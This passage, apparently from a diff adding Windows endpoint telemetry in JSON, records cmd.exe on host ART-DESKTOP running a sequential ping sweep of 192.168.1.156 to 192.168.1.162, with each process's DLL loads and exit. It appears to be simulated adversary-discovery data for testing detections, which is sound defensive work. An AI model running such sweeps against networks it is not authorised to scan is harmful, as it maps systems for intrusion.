"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "process", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572746830000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.156", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6236, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572746980000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "event_type": "process", + "pid": 6236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572751990000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-00107D115301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.157", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4236, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4236, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572752140000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "event_type": "process", + "pid": 4236, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572756840000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.158", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6700, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883572756980000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572756990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "event_type": "process", + "pid": 6700, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572761990000, + "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.159", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3348, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572762140000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "event_type": "process", + 
"pid": 3348, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572766830000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.160", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4768, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + 
"unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572766980000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "event_type": "process", + "pid": 4768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572771830000, + "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.161", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3596, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": 
"{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572771980000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "event_type": "process", + "pid": 3596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572776990000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.162", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5596, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572777130000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": 